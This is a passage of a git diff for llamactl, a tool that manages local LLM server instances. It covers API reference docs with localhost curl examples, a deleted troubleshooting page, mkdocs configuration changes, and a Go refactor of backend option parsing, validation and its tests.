DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopped",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing instance name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-2-7b.gguf",
"gpu_layers": 32
},
"environment": {
"CUDA_VISIBLE_DEVICES": "0",
"OMP_NUM_THREADS": "8"
}
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Backend-Specific Endpoints
### Parse Commands
Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
#### Parse Llama.cpp Command
Parse a llama-server command string into instance options.
```http
POST /api/v1/backends/llama-cpp/parse-command
```
**Request Body:**
```json
{
"command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
}
```
**Response:**
```json
{
"backend_type": "llama_cpp",
"llama_server_options": {
"model": "/path/to/model.gguf",
"ctx_size": 2048,
"port": 8080
}
}
```
#### Parse MLX-LM Command
Parse an MLX-LM server command string into instance options.
```http
POST /api/v1/backends/mlx/parse-command
```
**Request Body:**
```json
{
"command": "mlx_lm.server --model /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "mlx_lm",
"mlx_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
#### Parse vLLM Command
Parse a vLLM serve command string into instance options.
```http
POST /api/v1/backends/vllm/parse-command
```
**Request Body:**
```json
{
"command": "vllm serve /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "vllm",
"vllm_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
**Error Responses for Parse Commands:**
- `400 Bad Request`: Invalid request body, empty command, or parse error
- `500 Internal Server Error`: Encoding error
## Auto-Generated Documentation
The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -1,160 +0,0 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

View File

@@ -25,8 +25,8 @@ theme:
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.tabs.sticky
- toc.integrate
- navigation.top
- search.highlight
- search.share
@@ -49,14 +49,12 @@ markdown_extensions:
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
- Installation: installation.md
- Quick Start: quick-start.md
- Configuration: configuration.md
- Managing Instances: managing-instances.md
- API Reference: api-reference.md
- Troubleshooting: troubleshooting.md
plugins:
- search
@@ -66,9 +64,12 @@ plugins:
css_dir: css
javascript_dir: js
canonical_version: null
- neoteroi.mkdocsoad:
use_pymdownx: true
hooks:
- docs/readme_sync.py
- docs/fix_line_endings.py
extra:
version:
@@ -77,3 +78,6 @@ extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl
extra_css:
- css/css-v1.1.3.css

View File

@@ -1,10 +1,254 @@
package backends
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/validation"
"maps"
)
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
BackendTypeMlxLm BackendType = "mlx_lm"
BackendTypeVllm BackendType = "vllm"
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)
type backend interface {
BuildCommandArgs() []string
BuildDockerArgs() []string
GetPort() int
SetPort(int)
GetHost() string
Validate() error
ParseCommand(string) (any, error)
}
var backendConstructors = map[BackendType]func() backend{
BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} },
BackendTypeMlxLm: func() backend { return &MlxServerOptions{} },
BackendTypeVllm: func() backend { return &VllmServerOptions{} },
}
type Options struct {
BackendType BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *LlamaServerOptions `json:"-"`
MlxServerOptions *MlxServerOptions `json:"-"`
VllmServerOptions *VllmServerOptions `json:"-"`
}
func (o *Options) UnmarshalJSON(data []byte) error {
type Alias Options
aux := &struct {
*Alias
}{
Alias: (*Alias)(o),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Create backend from constructor map
if o.BackendOptions != nil {
constructor, exists := backendConstructors[o.BackendType]
if !exists {
return fmt.Errorf("unsupported backend type: %s", o.BackendType)
}
backend := constructor()
optionsData, err := json.Marshal(o.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
if err := json.Unmarshal(optionsData, backend); err != nil {
return fmt.Errorf("failed to unmarshal backend options: %w", err)
}
// Store in the appropriate typed field for backward compatibility
o.setBackendOptions(backend)
}
return nil
}
func (o *Options) MarshalJSON() ([]byte, error) {
type Alias Options
aux := &struct {
*Alias
}{
Alias: (*Alias)(o),
}
// Get backend and marshal it
backend := o.getBackend()
if backend != nil {
optionsData, err := json.Marshal(backend)
if err != nil {
return nil, fmt.Errorf("failed to marshal backend options: %w", err)
}
// Create a new map to avoid concurrent map writes
aux.BackendOptions = make(map[string]any)
if err := json.Unmarshal(optionsData, &aux.BackendOptions); err != nil {
return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err)
}
}
return json.Marshal(aux)
}
// setBackendOptions stores the backend in the appropriate typed field
func (o *Options) setBackendOptions(bcknd backend) {
switch v := bcknd.(type) {
case *LlamaServerOptions:
o.LlamaServerOptions = v
case *MlxServerOptions:
o.MlxServerOptions = v
case *VllmServerOptions:
o.VllmServerOptions = v
}
}
func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings {
switch o.BackendType {
case BackendTypeLlamaCpp:
return &backendConfig.LlamaCpp
case BackendTypeMlxLm:
return &backendConfig.MLX
case BackendTypeVllm:
return &backendConfig.VLLM
default:
return nil
}
}
// getBackend returns the actual backend implementation
func (o *Options) getBackend() backend {
switch o.BackendType {
case BackendTypeLlamaCpp:
return o.LlamaServerOptions
case BackendTypeMlxLm:
return o.MlxServerOptions
case BackendTypeVllm:
return o.VllmServerOptions
default:
return nil
}
}
func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool {
if backend.Docker != nil && backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm {
return true
}
return false
}
func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool {
backendSettings := o.getBackendSettings(backendConfig)
return o.isDockerEnabled(backendSettings)
}
// GetCommand builds the command to run the backend
func (o *Options) GetCommand(backendConfig *config.BackendConfig) string {
backendSettings := o.getBackendSettings(backendConfig)
if o.isDockerEnabled(backendSettings) {
return "docker"
}
return backendSettings.Command
}
// buildCommandArgs builds command line arguments for the backend
func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string {
var args []string
backendSettings := o.getBackendSettings(backendConfig)
backend := o.getBackend()
if backend == nil {
return args
}
if o.isDockerEnabled(backendSettings) {
// For Docker, start with Docker args
args = append(args, backendSettings.Docker.Args...)
args = append(args, backendSettings.Docker.Image)
args = append(args, backend.BuildDockerArgs()...)
} else {
// For native execution, start with backend args
args = append(args, backendSettings.Args...)
args = append(args, backend.BuildCommandArgs()...)
}
return args
}
// BuildEnvironment builds the environment variables for the backend process
func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string {
backendSettings := o.getBackendSettings(backendConfig)
env := map[string]string{}
if backendSettings.Environment != nil {
maps.Copy(env, backendSettings.Environment)
}
if o.isDockerEnabled(backendSettings) {
if backendSettings.Docker.Environment != nil {
maps.Copy(env, backendSettings.Docker.Environment)
}
}
if environment != nil {
maps.Copy(env, environment)
}
return env
}
func (o *Options) GetPort() int {
backend := o.getBackend()
if backend != nil {
return backend.GetPort()
}
return 0
}
func (o *Options) SetPort(port int) {
backend := o.getBackend()
if backend != nil {
backend.SetPort(port)
}
}
func (o *Options) GetHost() string {
backend := o.getBackend()
if backend != nil {
return backend.GetHost()
}
return "localhost"
}
func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string {
backendSettings := o.getBackendSettings(backendConfig)
return backendSettings.ResponseHeaders
}
// ValidateInstanceOptions performs validation based on backend type
func (o *Options) ValidateInstanceOptions() error {
backend := o.getBackend()
if backend == nil {
return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType))
}
return backend.Validate()
}

View File

@@ -9,7 +9,7 @@ import (
)
// BuildCommandArgs converts a struct to command line arguments
func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
func BuildCommandArgs(options any, multipleFlags map[string]struct{}) []string {
var args []string
v := reflect.ValueOf(options).Elem()
@@ -28,9 +28,10 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
continue
}
// Get flag name from JSON tag
flagName := strings.Split(jsonTag, ",")[0]
flagName = strings.ReplaceAll(flagName, "_", "-")
// Get flag name from JSON tag (snake_case)
jsonFieldName := strings.Split(jsonTag, ",")[0]
// Convert to kebab-case for CLI flags
flagName := strings.ReplaceAll(jsonFieldName, "_", "-")
switch field.Kind() {
case reflect.Bool:
@@ -51,7 +52,8 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
if multipleFlags[flagName] {
// Use jsonFieldName (snake_case) for multipleFlags lookup
if _, isMultiValue := multipleFlags[jsonFieldName]; isMultiValue {
// Multiple flags: --flag value1 --flag value2
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())

View File

@@ -1,32 +1,24 @@
package llamacpp
package backends
import (
"encoding/json"
"llamactl/pkg/backends"
"fmt"
"llamactl/pkg/validation"
"reflect"
"strconv"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Used for both parsing (with underscores) and building (with dashes)
var multiValuedFlags = map[string]bool{
// Parsing keys (with underscores)
"override_tensor": true,
"override_kv": true,
"lora": true,
"lora_scaled": true,
"control_vector": true,
"control_vector_scaled": true,
"dry_sequence_breaker": true,
"logit_bias": true,
// Building keys (with dashes)
"override-tensor": true,
"override-kv": true,
"lora-scaled": true,
"control-vector": true,
"control-vector-scaled": true,
"dry-sequence-breaker": true,
"logit-bias": true,
// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
var llamaMultiValuedFlags = map[string]struct{}{
"override_tensor": {},
"override_kv": {},
"lora": {},
"lora_scaled": {},
"control_vector": {},
"control_vector_scaled": {},
"dry_sequence_breaker": {},
"logit_bias": {},
}
type LlamaServerOptions struct {
@@ -335,11 +327,41 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
return nil
}
func (o *LlamaServerOptions) GetPort() int {
return o.Port
}
func (o *LlamaServerOptions) SetPort(port int) {
o.Port = port
}
func (o *LlamaServerOptions) GetHost() string {
return o.Host
}
func (o *LlamaServerOptions) Validate() error {
if o == nil {
return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validation.ValidateStructStrings(o, ""); err != nil {
return err
}
// Basic network validation for port
if o.Port < 0 || o.Port > 65535 {
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
}
return nil
}
// BuildCommandArgs converts InstanceOptions to command line arguments
func (o *LlamaServerOptions) BuildCommandArgs() []string {
// Llama uses multiple flags for arrays by default (not comma-separated)
// Use package-level multiValuedFlags variable
return backends.BuildCommandArgs(o, multiValuedFlags)
// Use package-level llamaMultiValuedFlags variable
return BuildCommandArgs(o, llamaMultiValuedFlags)
}
func (o *LlamaServerOptions) BuildDockerArgs() []string {
@@ -347,19 +369,19 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string {
return o.BuildCommandArgs()
}
// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
// ParseCommand parses a llama-server command string into LlamaServerOptions
// Supports multiple formats:
// 1. Full command: "llama-server --model file.gguf"
// 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
// 3. Args only: "--model file.gguf --gpu-layers 32"
// 4. Multiline commands with backslashes
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
func (o *LlamaServerOptions) ParseCommand(command string) (any, error) {
executableNames := []string{"llama-server"}
var subcommandNames []string // Llama has no subcommands
// Use package-level multiValuedFlags variable
// Use package-level llamaMultiValuedFlags variable
var llamaOptions LlamaServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
if err := parseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
return nil, err
}

View File

@@ -1,71 +1,38 @@
package llamacpp_test
package backends_test
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends"
"llamactl/pkg/testutil"
"reflect"
"slices"
"testing"
)
func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
Verbose: true,
CtxSize: 4096,
GPULayers: 32,
}
args := options.BuildCommandArgs()
// Check individual arguments
expectedPairs := map[string]string{
"--model": "/path/to/model.gguf",
"--port": "8080",
"--host": "localhost",
"--ctx-size": "4096",
"--gpu-layers": "32",
}
for flag, expectedValue := range expectedPairs {
if !containsFlagWithValue(args, flag, expectedValue) {
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
}
}
// Check standalone boolean flag
if !contains(args, "--verbose") {
t.Errorf("Expected --verbose flag not found in %v", args)
}
}
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options llamacpp.LlamaServerOptions
options backends.LlamaServerOptions
expected []string
excluded []string
}{
{
name: "verbose true",
options: llamacpp.LlamaServerOptions{
options: backends.LlamaServerOptions{
Verbose: true,
},
expected: []string{"--verbose"},
},
{
name: "verbose false",
options: llamacpp.LlamaServerOptions{
options: backends.LlamaServerOptions{
Verbose: false,
},
excluded: []string{"--verbose"},
},
{
name: "multiple booleans",
options: llamacpp.LlamaServerOptions{
options: backends.LlamaServerOptions{
Verbose: true,
FlashAttn: true,
Mlock: false,
@@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
args := tt.options.BuildCommandArgs()
for _, expectedArg := range tt.expected {
if !contains(args, expectedArg) {
if !testutil.Contains(args, expectedArg) {
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
}
}
for _, excludedArg := range tt.excluded {
if contains(args, excludedArg) {
if testutil.Contains(args, excludedArg) {
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
}
}
@@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
}
}
func TestBuildCommandArgs_NumericFields(t *testing.T) {
options := llamacpp.LlamaServerOptions{
Port: 8080,
Threads: 4,
CtxSize: 2048,
GPULayers: 16,
Temperature: 0.7,
TopK: 40,
TopP: 0.9,
}
args := options.BuildCommandArgs()
expectedPairs := map[string]string{
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temp": "0.7",
"--top-k": "40",
"--top-p": "0.9",
}
for flag, expectedValue := range expectedPairs {
if !containsFlagWithValue(args, flag, expectedValue) {
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
}
}
}
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamacpp.LlamaServerOptions{
func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
options := backends.LlamaServerOptions{
Port: 0, // Should be excluded
Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded
@@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
}
for _, excludedArg := range excludedArgs {
if contains(args, excludedArg) {
if testutil.Contains(args, excludedArg) {
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
}
}
}
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamacpp.LlamaServerOptions{
func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
options := backends.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"},
@@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
for flag, values := range expectedOccurrences {
for _, value := range values {
if !containsFlagWithValue(args, flag, value) {
if !testutil.ContainsFlagWithValue(args, flag, value) {
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
}
}
}
}
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamacpp.LlamaServerOptions{
func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
options := backends.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args
}
@@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
excludedArgs := []string{"--lora", "--override-tensor"}
for _, excludedArg := range excludedArgs {
if contains(args, excludedArg) {
if testutil.Contains(args, excludedArg) {
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
}
}
}
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
// Test snake_case to kebab-case conversion
options := llamacpp.LlamaServerOptions{
CtxSize: 4096,
GPULayers: 32,
ThreadsBatch: 2,
FlashAttn: true,
TopK: 40,
TopP: 0.9,
}
args := options.BuildCommandArgs()
// Check that field names are properly converted
expectedFlags := []string{
"--ctx-size", // ctx_size -> ctx-size
"--gpu-layers", // gpu_layers -> gpu-layers
"--threads-batch", // threads_batch -> threads-batch
"--flash-attn", // flash_attn -> flash-attn
"--top-k", // top_k -> top-k
"--top-p", // top_p -> top-p
}
for _, flag := range expectedFlags {
if !contains(args, flag) {
t.Errorf("Expected flag %q not found in %v", flag, args)
}
}
}
func TestUnmarshalJSON_StandardFields(t *testing.T) {
func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
jsonData := `{
"model": "/path/to/model.gguf",
"port": 8080,
@@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"temp": 0.7
}`
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
}
}
func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct {
name string
jsonData string
checkFn func(llamacpp.LlamaServerOptions) error
checkFn func(backends.LlamaServerOptions) error
}{
{
name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
}
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "context size alternatives",
jsonData: `{"c": 2048}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
}
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "temperature alternatives",
jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamacpp.LlamaServerOptions) error {
checkFn: func(opts backends.LlamaServerOptions) error {
if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
}
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
}
}
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil {
t.Error("Expected error for invalid JSON")
}
}
func TestUnmarshalJSON_ArrayFields(t *testing.T) {
func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
jsonData := `{
"lora": ["adapter1.bin", "adapter2.bin"],
"override_tensor": ["tensor1", "tensor2"],
"dry_sequence_breaker": [".", "!", "?"]
}`
var options llamacpp.LlamaServerOptions
var options backends.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) {
name string
command string
expectErr bool
validate func(*testing.T, *backends.LlamaServerOptions)
}{
{
name: "basic command",
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/path/to/model.gguf" {
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
}
if opts.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
},
},
{
name: "args only",
command: "--model /path/to/model.gguf --ctx-size 4096",
expectErr: false,
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
if opts.Model != "/path/to/model.gguf" {
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
}
if opts.CtxSize != 4096 {
